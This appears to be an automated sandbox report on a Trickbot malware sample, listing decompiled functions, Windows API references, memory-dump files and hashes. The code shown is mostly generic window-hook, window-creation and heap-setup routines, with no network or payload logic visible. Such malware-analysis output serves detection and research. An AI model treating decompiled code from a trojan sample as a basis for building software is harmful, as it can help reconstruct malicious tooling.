Part of subcall function 00433BB8: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00433C8A
Part of subcall function 00433BB8: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00433CB7

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
String ID:
API String ID: 3389432936-0
Opcode ID: 634ff82155919c59adbf0de0d4feaa2c6d5cc4625fdd2e30a239f961e6f0c57b
Instruction ID: 63e4ef7212027fca72b37c035b56a8b925f32eef7eff3c7c91452b5a015d8c70
Opcode Fuzzy Hash: 634ff82155919c59adbf0de0d4feaa2c6d5cc4625fdd2e30a239f961e6f0c57b
Instruction Fuzzy Hash: ABF0A9709043109FD710EF65C440A0A7BE8AF48710F05948FF4848B3A2CBB8EA40CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA3F, Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041DA3F(void* __esi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				char _v264;
				void* __ebp;
				long _t12;
				void* _t22;

				GetModuleFileNameA(_a4,  &_v264, 0x104);
				_t12 = GetShortPathNameA( &_v264, E004181F7(_a8, _t22, 0x104), 0x104); // executed
				_t23 = _t12;
				if(_t12 == 0) {
					E00418005(_a8,  &_v264);
				}
				return E00418246(_a8, _t23, 0xffffffff);
			}

0x0041da59
0x0041da71
0x0041da77
0x0041da7a
0x0041da86
0x0041da86
0x0041da96

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041DA59
GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 0041DA71

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Name$FileModulePathShort
String ID:
API String ID: 4073693819-0
Opcode ID: b9f54783031963a94c2d05d7bb1f4424fcbd7a89438525dc67f6f7c8010c0e0f
Instruction ID: c2ebb156cba56f0b6d65d89b5853084983842b5ba43459aea1822a54a42a79e3
Opcode Fuzzy Hash: b9f54783031963a94c2d05d7bb1f4424fcbd7a89438525dc67f6f7c8010c0e0f
Instruction Fuzzy Hash: 33F0A7B64000187BCB10EF51CCC4DDF376C9F05364F004166BA55D2190CE749AC4CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C021, Relevance: 3.0, APIs: 2, Instructions: 27
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041C021() {
				void* _t6;
				void* _t7;
				struct HHOOK__* _t9;
				void* _t18;

				_t6 = E00432562();
				if( *((char*)(_t6 + 0x14)) == 0) {
					_t7 = E00432335();
					_t9 = SetWindowsHookExA(0xffffffff, E0041C379, 0, GetCurrentThreadId()); // executed
					_push(E0043056B);
					 *(_t7 + 0x30) = _t9;
					_t18 = E00432DE3(0x44b4d8);
					if( *((intOrPtr*)(_t18 + 0x14)) != 0) {
						 *((intOrPtr*)(_t18 + 0x14))( *((intOrPtr*)(E00432562() + 8)));
					}
					return E00432D4E(0x44b4d4, E00431B7D);
				}
				return _t6;
			}

0x0041c021
0x0041c02a
0x0041c02d
0x0041c044
0x0041c04a
0x0041c054
0x0041c05c
0x0041c062
0x0041c06c
0x0041c06c
0x00000000
0x0041c07e
0x0041c07f

APIs

GetCurrentThreadId.KERNEL32(?,00433BB2,00000000,?,00413D3C,00000000,00000000,00000000,00000000,00405287,00000000), ref: 0041C034
SetWindowsHookExA.USER32(000000FF,0041C379,00000000,00000000), ref: 0041C044

Part of subcall function 00432DE3: __EH_prolog.LIBCMT ref: 00432DE8

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CurrentH_prologHookThreadWindows
String ID:
API String ID: 2183259885-0
Opcode ID: 64520f0e3fb44fc85b4c7eb34fd13ba60e6c7669913ab76fc2623c2900d1d870
Instruction ID: 9462778055dcf9d82bb265586a91095737fdd4a16b4e3bdb60d39efc2548aa20
Opcode Fuzzy Hash: 64520f0e3fb44fc85b4c7eb34fd13ba60e6c7669913ab76fc2623c2900d1d870
Instruction Fuzzy Hash: 47F0A0318807107AE7247BB09E0DB6D3A909F0C754F14325FB512AA1E2CBAC9D80879D

Uniqueness

Uniqueness Score: -1.00%

Function 004190CA, Relevance: 3.0, APIs: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004190CA(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
				_Unknown_base(*)()* _t11;
				long _t12;
				intOrPtr* _t17;

				_t17 = __ecx;
				_t11 =  *(__ecx + 0x28);
				if(_t11 != 0) {
					L3:
					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x1c), _a4, _a8, _a12); // executed
					return _t12;
				}
				_t11 =  *( *((intOrPtr*)( *__ecx + 0x80))());
				if(_t11 != 0) {
					goto L3;
				}
				return DefWindowProcA( *(__ecx + 0x1c), _a4, _a8, _a12);
			}

0x004190ce
0x004190d0
0x004190d5
0x004190f9
0x00419106
0x00000000
0x00419106
0x004190df
0x004190e3
0x00000000
0x00000000
0x00000000

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 004190F1
CallWindowProcA.USER32(?,?,?,?,?), ref: 00419106

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ProcWindow$Call
String ID:
API String ID: 2316559721-0
Opcode ID: d1c9fe6cb2fb7f8f18b748616b0adcb3f8bdc8cace415b80df30f0d7d92a3749
Instruction ID: 76daa847bd17bf4e338bbadd7040889ba36f34da90edf34246a0ed93101e2099
Opcode Fuzzy Hash: d1c9fe6cb2fb7f8f18b748616b0adcb3f8bdc8cace415b80df30f0d7d92a3749
Instruction Fuzzy Hash: 44F09236100209FFDF229F95EC48D9A7FB9FF08350B04846AFA5586121D772D9A0AF54

Uniqueness

Uniqueness Score: -1.00%

Function 00418D00, Relevance: 3.0, APIs: 2, Instructions: 25
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418D00(void* __ebp) {
				intOrPtr _v0;
				struct HHOOK__* _t6;
				intOrPtr _t9;
				struct HHOOK__* _t10;

				_t6 = E00432D4E(0x44b2ec, E00430506);
				_t10 = _t6;
				_t9 = _v0;
				if( *((intOrPtr*)(_t10 + 0x14)) == _t9) {
					return _t6;
				}
				if( *(_t10 + 0x2c) == 0) {
					_t6 = SetWindowsHookExA(5, E00418B0A, 0, GetCurrentThreadId()); // executed
					 *(_t10 + 0x2c) = _t6;
					if(_t6 == 0) {
						_t6 = E0041564B(0x44b2ec);
					}
				}
				 *((intOrPtr*)(_t10 + 0x14)) = _t9;
				return _t6;
			}

0x00418d0c
0x00418d11
0x00418d13
0x00418d1a
0x00418d49
0x00418d49
0x00418d20
0x00418d32
0x00418d3a
0x00418d3d
0x00418d3f
0x00418d3f
0x00418d3d
0x00418d44
0x00000000

APIs

Part of subcall function 00432D4E: TlsGetValue.KERNEL32(0044B4A0,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000), ref: 00432D8D

GetCurrentThreadId.KERNEL32(Function_00030506,?,?,00418E08), ref: 00418D22
SetWindowsHookExA.USER32(00000005,Function_00018B0A,00000000,00000000), ref: 00418D32

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CurrentHookThreadValueWindows
String ID:
API String ID: 933525246-0
Opcode ID: d1136e87f226ddec6b263baa8e2990c34332d1232755c2a598aeefaa31318c5c
Instruction ID: a66463dc830444ebe8435426098a80fba26ef64b7f9df52c3a0b8baa7f6eb943
Opcode Fuzzy Hash: d1136e87f226ddec6b263baa8e2990c34332d1232755c2a598aeefaa31318c5c
Instruction Fuzzy Hash: 7EE09B71601700AFD3309F52ED05B5777E5DB94712F10552FF14585580DB749881CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040815F, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040815F(intOrPtr _a4) {
				void* _t6;
				void* _t9;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x44d0bc = _t6;
				if(_t6 == 0) {
					L3:
					return 0;
				} else {
					if(E0040819B() != 0) {
						_t9 = 1;
						return _t9;
					} else {
						HeapDestroy( *0x44d0bc);
						goto L3;
					}
				}
			}

0x00408170
0x00408178
0x0040817d
0x00408194
0x00408196
0x0040817f
0x00408186
0x00408199
0x0040819a
0x00408188
0x0040818e
0x00000000
0x0040818e
0x00408186

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00405205,00000001), ref: 00408170

Part of subcall function 0040819B: HeapAlloc.KERNEL32(00000000,00000140,00408184), ref: 004081A8

HeapDestroy.KERNEL32 ref: 0040818E

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: 968265180b5e53915b965500d779458747a6f36c005ce43ade8de0eb86e1fc80
Instruction ID: 3bbf16bb50bd95cb4f1ac5c7854d34f4ad95e20ff08daeb615483b1b8e28411a
Opcode Fuzzy Hash: 968265180b5e53915b965500d779458747a6f36c005ce43ade8de0eb86e1fc80
Instruction Fuzzy Hash: 63E0C2746183029AEF100F30AD0876639D49F40386F00443EB585D90E4EBB488429A1D

Uniqueness

Uniqueness Score: -1.00%

Function 0042192F, Relevance: 1.7, APIs: 1, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042192F(intOrPtr* __ecx) {
				signed int _t64;
				void* _t69;
				intOrPtr* _t72;
				signed int _t74;
				signed int _t88;
				signed int _t92;
				signed int _t101;
				void* _t102;
				intOrPtr* _t106;
				intOrPtr* _t125;
				intOrPtr* _t128;
				intOrPtr* _t131;
				void* _t133;

				E00405340(E004382E0, _t133);
				_push(__ecx);
				_push(__ecx);
				_t128 = __ecx;
				_t101 = 0;
				_t131 =  *((intOrPtr*)(__ecx + 0x64));
				 *(_t133 - 0x10) = 0;
				 *((intOrPtr*)(_t133 - 0x14)) = 0;
				if(_t131 == 0) {
					_t106 = __ecx;
					_t131 =  *((intOrPtr*)( *__ecx + 0x6c))();
					 *((intOrPtr*)(_t133 - 0x14)) = 1;
					L4:
					_t138 = _t131 - _t101;
					if(_t131 != _t101) {
						__eflags =  *(_t133 - 0x10) - _t101;
						if( *(_t133 - 0x10) != _t101) {
							L10:
							__eflags =  *((intOrPtr*)(_t133 + 8)) - _t101;
							if( *((intOrPtr*)(_t133 + 8)) != _t101) {
								E00432562();
								E0041BB22();
								 *(_t133 - 4) = _t101;
								_t102 =  *((intOrPtr*)( *_t131 + 0x58))();
								 *((intOrPtr*)( *_t131 + 0x5c))(0);
								_t64 =  *((intOrPtr*)( *_t131 + 0x74))( *((intOrPtr*)(_t133 + 8)));
								__eflags = _t64;
								if(_t64 != 0) {
									 *((intOrPtr*)( *_t131 + 0x54))( *((intOrPtr*)(_t133 + 8)), 1);
									 *(_t133 - 4) =  *(_t133 - 4) | 0xffffffff;
									E00432562();
									E0041BB37();
									_t101 = 0;
									__eflags = 0;
									L25:
									_t69 = E0041C00C();
									__eflags =  *((intOrPtr*)(_t133 - 0x14)) - _t101;
									if( *((intOrPtr*)(_t133 - 0x14)) != _t101) {
										__eflags =  *(_t69 + 0x1c) - _t101;
										if( *(_t69 + 0x1c) == _t101) {
											 *(_t69 + 0x1c) =  *(_t133 - 0x10);
										}
									}
									 *((intOrPtr*)( *_t128 + 0x74))( *(_t133 - 0x10), _t131,  *((intOrPtr*)(_t133 + 0xc)));
									_t72 = _t131;
									L29:
									 *[fs:0x0] =  *((intOrPtr*)(_t133 - 0xc));
									return _t72;
								}
								__eflags =  *((intOrPtr*)(_t133 - 0x14)) - _t64;
								if( *((intOrPtr*)(_t133 - 0x14)) == _t64) {
									_t74 =  *((intOrPtr*)( *_t131 + 0x58))();
									__eflags = _t74;
									if(_t74 != 0) {
										 *((intOrPtr*)( *_t128 + 0x84))(_t131);
										 *((intOrPtr*)( *_t131 + 0x70))();
									} else {
										 *((intOrPtr*)( *_t131 + 0x5c))(_t102);
									}
								} else {
									 *((intOrPtr*)( *( *(_t133 - 0x10)) + 0x58))();
								}
								_t37 = _t133 - 4;
								 *_t37 =  *(_t133 - 4) | 0xffffffff;
								__eflags =  *_t37;
								E00432562();
								E0041BB37();
								L23:
								_t72 = 0;
								goto L29;
							}
							 *((intOrPtr*)( *_t128 + 0x84))(_t131);
							__eflags =  *((intOrPtr*)(_t133 + 0xc)) - _t101;
							if( *((intOrPtr*)(_t133 + 0xc)) == _t101) {
								 *((intOrPtr*)(_t131 + 0x4c)) = 1;
							}
							_t88 =  *((intOrPtr*)( *_t131 + 0x70))();
							__eflags = _t88;
							if(_t88 != 0) {
								goto L25;
							} else {
								__eflags =  *((intOrPtr*)(_t133 - 0x14)) - _t101;
								if( *((intOrPtr*)(_t133 - 0x14)) != _t101) {
									 *((intOrPtr*)( *( *(_t133 - 0x10)) + 0x58))();
								}
								goto L23;
							}
						}
						 *(_t131 + 0x48) =  *(_t131 + 0x48) & 0x00000000;
						_t125 = _t128; // executed
						_t92 =  *((intOrPtr*)( *_t128 + 0x70))(_t131, 0);
						__eflags = _t92;
						 *(_t133 - 0x10) = _t92;
						if(__eflags != 0) {
							_t101 = 0;
							__eflags = 0;
							goto L10;
						}
						E00428683(_t125, __eflags);
						 *((intOrPtr*)( *_t131 + 4))(1, 0xf104, _t92, 0xffffffff);
						goto L23;
					}
					_push(0xffffffff);
					_push(_t101);
					_push(0xf104);
					E00428683(_t106, _t138);
					goto L23;
				}
				_t106 = _t131;
				if( *((intOrPtr*)( *_t131 + 0x90))() == 0) {
					goto L23;
				} else {
					 *(_t133 - 0x10) = E004041A9();
					goto L4;
				}
			}

0x00421934
0x00421939
0x0042193a
0x0042193e
0x00421940
0x00421942
0x00421945
0x0042194a
0x0042194d
0x0042196d
0x00421972
0x00421974
0x0042197b
0x0042197b
0x0042197d
0x00421991
0x00421994
0x004219ce
0x004219ce
0x004219d1
0x00421a0c
0x00421a14
0x00421a1d
0x00421a23
0x00421a2b
0x00421a35
0x00421a38
0x00421a3a
0x00421a90
0x00421a93
0x00421a97
0x00421a9f
0x00421aa4
0x00421aa4
0x00421aa6
0x00421aa6
0x00421aab
0x00421aae
0x00421ab0
0x00421ab3
0x00421ab8
0x00421ab8
0x00421ab3
0x00421ac6
0x00421ac9
0x00421acb
0x00421ad1
0x00421ad9
0x00421ad9
0x00421a3c
0x00421a3f
0x00421a4f
0x00421a52
0x00421a54
0x00421a65
0x00421a6f
0x00421a56
0x00421a5b
0x00421a5b
0x00421a41
0x00421a46
0x00421a46
0x00421a72
0x00421a72
0x00421a72
0x00421a76
0x00421a7e
0x00421a83
0x00421a83
0x00000000
0x00421a83
0x004219d8
0x004219de
0x004219e1
0x004219e3
0x004219e3
0x004219ee
0x004219f1
0x004219f3
0x00000000
0x004219f9
0x004219f9
0x004219fc
0x00421a07
0x00421a07
0x00000000
0x004219fc
0x004219f3
0x00421999
0x004219a2
0x004219a4
0x004219a7
0x004219a9
0x004219af
0x004219cc
0x004219cc
0x00000000
0x004219cc
0x004219b9
0x004219c4
0x00000000
0x004219c4
0x0042197f
0x00421981
0x00421982
0x00421987
0x00000000
0x00421987
0x00421951
0x0042195b
0x00000000
0x00421961
0x00421966
0x00000000
0x00421966

APIs

__EH_prolog.LIBCMT ref: 00421934

Part of subcall function 00428683: __EH_prolog.LIBCMT ref: 00428688

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 10727856885482daadd3d031189a0a57ab7738776291a269f3ea5458fab1d072
Instruction ID: aec43840b8fe7224f0192343ac1368ee1e66e74183b0c6a46887e69fdc5b0869
Opcode Fuzzy Hash: 10727856885482daadd3d031189a0a57ab7738776291a269f3ea5458fab1d072
Instruction Fuzzy Hash: C0519D70701221DFCB24EF65C498A6EBBB1FF58314B11416EE5529B3A1CB789E81CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0041868C, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041868C(void* __edx) {
				void* _t37;
				void* _t43;
				intOrPtr _t52;
				signed int _t55;
				signed int _t59;
				intOrPtr* _t62;
				void* _t63;
				signed int _t68;
				intOrPtr _t75;
				void* _t78;
				void* _t80;

				_t63 = __edx;
				E00405340(E004377B8, _t78);
				 *((intOrPtr*)(_t78 - 0x10)) = _t80 - 0x34;
				_t52 = E00432D4E(0x44b2ec, E00430506);
				_t55 = 7;
				_t3 = _t52 + 0x34; // 0x34
				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
				 *((intOrPtr*)(_t78 - 0x14)) = _t52;
				_t37 = memcpy(_t78 - 0x40, _t3, _t55 << 2);
				_t75 =  *((intOrPtr*)(_t78 + 0x10));
				_t68 =  *(_t78 + 8);
				 *_t37 =  *(_t78 + 0xc);
				 *((intOrPtr*)(_t52 + 0x3c)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t52 + 0x38)) = _t75;
				 *((intOrPtr*)(_t52 + 0x40)) =  *((intOrPtr*)(_t78 + 0x18));
				if(_t75 == 2) {
					_t62 =  *((intOrPtr*)(_t68 + 0x34));
					if(_t62 != 0) {
						 *((intOrPtr*)( *_t62 + 0x5c))(0);
					}
				}
				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
				if(_t75 == 0x110) {
					E00418519(_t68, _t78 - 0x24, _t78 + 8);
				}
				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t68 + 0x98))(_t75,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
				if(_t75 == 0x110) {
					E0041853C(_t63, _t68, _t78 - 0x24,  *(_t78 + 8));
				}
				_t29 = _t52 + 0x34; // 0x34
				_t59 = 7;
				_t43 = memcpy(_t29, _t78 - 0x40, _t59 << 2);
				 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
				return _t43;
			}

0x0041868c
0x00418691
0x004186a1
0x004186ae
0x004186b2
0x004186b6
0x004186b9
0x004186bf
0x004186c2
0x004186c7
0x004186ca
0x004186cd
0x004186d5
0x004186db
0x004186de
0x004186e1
0x004186e3
0x004186e8
0x004186ee
0x004186ee
0x004186e8
0x004186f1
0x004186fb
0x00418706
0x00418706
0x00418722
0x00418725
0x0041872f
0x0041872f
0x00418765
0x00418768
0x0041876c
0x00418773
0x0041877c

APIs

__EH_prolog.LIBCMT ref: 00418691

Part of subcall function 00432D4E: TlsGetValue.KERNEL32(0044B4A0,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000), ref: 00432D8D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prologValue
String ID:
API String ID: 3700342317-0
Opcode ID: 03b23b424f1eef43ace060ad27b7a6110b5d970d4799c741caca17ef366c87f3
Instruction ID: 0bd7cddfc2eb3fa599fbe5144d780db0330a5adcf4b7bcad7e5349bdc5847d3b
Opcode Fuzzy Hash: 03b23b424f1eef43ace060ad27b7a6110b5d970d4799c741caca17ef366c87f3
Instruction Fuzzy Hash: E5214872A00209EFDB05DF54C981AEE7BB9FB48354F10406AF905AB281D774AE90CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00418D8E, Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00418D8E(intOrPtr* __ecx, long _a4, CHAR* _a8, CHAR* _a12, long _a16, int _a20, int _a24, int _a28, int _a32, struct HWND__* _a36, struct HMENU__* _a40, void* _a44) {
				long _v8;
				CHAR* _v12;
				CHAR* _v16;
				long _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				struct HWND__* _v40;
				struct HMENU__* _v44;
				struct HINSTANCE__* _v48;
				void* _v52;
				void* __ebp;
				struct HWND__* _t59;
				struct HWND__* _t74;
				intOrPtr* _t76;
				void* _t77;

				_v8 = _a4;
				_v12 = _a8;
				_v16 = _a12;
				_v20 = _a16;
				_v24 = _a20;
				_v28 = _a24;
				_v32 = _a28;
				_v36 = _a32;
				_v40 = _a36;
				_t76 = __ecx;
				_v44 = _a40;
				_v48 =  *((intOrPtr*)(E00432562() + 8));
				_v52 = _a44;
				_push( &_v52);
				if( *((intOrPtr*)( *_t76 + 0x5c))() != 0) {
					E00418D00(_t77, _t76);
					_t59 = CreateWindowExA(_v8, _v12, _v16, _v20, _v24, _v28, _v32, _v36, _v40, _v44, _v48, _v52); // executed
					_t74 = _t59;
					if(E00418D4C() == 0) {
						 *((intOrPtr*)( *_t76 + 0xa4))();
					}
					return 0 | _t74 != 0x00000000;
				}
				 *((intOrPtr*)( *_t76 + 0xa4))();
				return 0;
			}

0x00418d98
0x00418d9e
0x00418da4
0x00418daa
0x00418db0
0x00418db6
0x00418dbc
0x00418dc2
0x00418dc8
0x00418dce
0x00418dd0
0x00418dde
0x00418de4
0x00418de9
0x00418df1
0x00418e03
0x00418e2c
0x00418e32
0x00418e3b
0x00418e41
0x00418e41
0x00000000
0x00418e4e
0x00418df7
0x00000000

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00418E2C

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9128e1a21bede23b692c54286ac151f026e8d1e10508c372e1cc72b4f43bce75
Instruction ID: 00bd25db292df92e4312f8edc2925c12ce9c82f3169ed723797dc74e51acd5e3
Opcode Fuzzy Hash: 9128e1a21bede23b692c54286ac151f026e8d1e10508c372e1cc72b4f43bce75
Instruction Fuzzy Hash: 67319D75A00219AFCF01DFA8C944ADEBBF1BF4C304F11446AF918E7210E7359A519F94

Uniqueness

Uniqueness Score: -1.00%

Function 0042B58B, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0042B58B(void* __ecx) {
				intOrPtr _t25;
				void* _t27;
				void* _t29;
				signed int _t32;
				void* _t49;

				E00405340(E00438A20, _t49);
				_t25 =  *((intOrPtr*)(__ecx + 0x10));
				_t54 = _t25;
				if(_t25 != 0) {
					__eflags = _t25 - 1;
					_t32 =  *( *((intOrPtr*)(__ecx + 8)) + 8);
					if(_t25 <= 1) {
						L5:
						_t27 =  *((intOrPtr*)( *_t32 + 0x80))(0, 1);
					} else {
						E00417799(_t49 - 0x70, 0x7801, 0);
						 *(_t49 - 0x10) =  *(_t49 - 0x10) & 0x00000000;
						 *((intOrPtr*)(_t49 - 0x70)) = 0x43e218;
						 *((intOrPtr*)(_t49 - 0x14)) = __ecx + 4;
						 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
						_t29 = E0041784E(_t49 - 0x70);
						__eflags = _t29 - 1;
						if(_t29 != 1) {
							 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
							 *((intOrPtr*)(_t49 - 0x70)) = 0x43e218;
							_t27 = E00417440(_t49 - 0x70);
						} else {
							_t32 =  *(_t49 - 0x10);
							_t13 = _t49 - 4;
							 *_t13 =  *(_t49 - 4) | 0xffffffff;
							__eflags =  *_t13;
							 *((intOrPtr*)(_t49 - 0x70)) = 0x43e218;
							E00417440(_t49 - 0x70);
							goto L5;
						}
					}
				} else {
					_push(0xffffffff);
					_push(_t25);
					_push(0xf104);
					_t27 = E00428683(__ecx, _t54);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t27;
			}

0x0042b590
0x0042b59d
0x0042b5a0
0x0042b5a2
0x0042b5b6
0x0042b5b9
0x0042b5bc
0x0042b602
0x0042b60a
0x0042b5be
0x0042b5c8
0x0042b5cd
0x0042b5d9
0x0042b5dc
0x0042b5df
0x0042b5e6
0x0042b5eb
0x0042b5ee
0x0042b61f
0x0042b626
0x0042b629
0x0042b5f0
0x0042b5f0
0x0042b5f3
0x0042b5f3
0x0042b5f3
0x0042b5fa
0x0042b5fd
0x00000000
0x0042b5fd
0x0042b5ee
0x0042b5a4
0x0042b5a4
0x0042b5a6
0x0042b5a7
0x0042b5ac
0x0042b5ac
0x0042b616
0x0042b61e

APIs

__EH_prolog.LIBCMT ref: 0042B590

Part of subcall function 00428683: __EH_prolog.LIBCMT ref: 00428688

Part of subcall function 00417440: __EH_prolog.LIBCMT ref: 00417445

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
